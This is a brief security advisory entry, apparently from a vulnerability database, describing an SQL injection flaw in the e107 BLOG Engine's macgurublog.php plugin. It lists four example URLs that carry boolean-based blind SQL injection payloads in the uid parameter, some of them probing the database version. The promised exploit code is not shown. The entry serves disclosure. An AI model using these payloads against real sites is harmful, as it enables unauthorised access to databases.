|
e107 BLOG Engine 'macgurublog.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URIs are available: http://www.ecample.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1 http://www.example.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3 http://www.example.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5 http://www.example.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4 The following exploit code is available: |
|
|
Privacy Statement |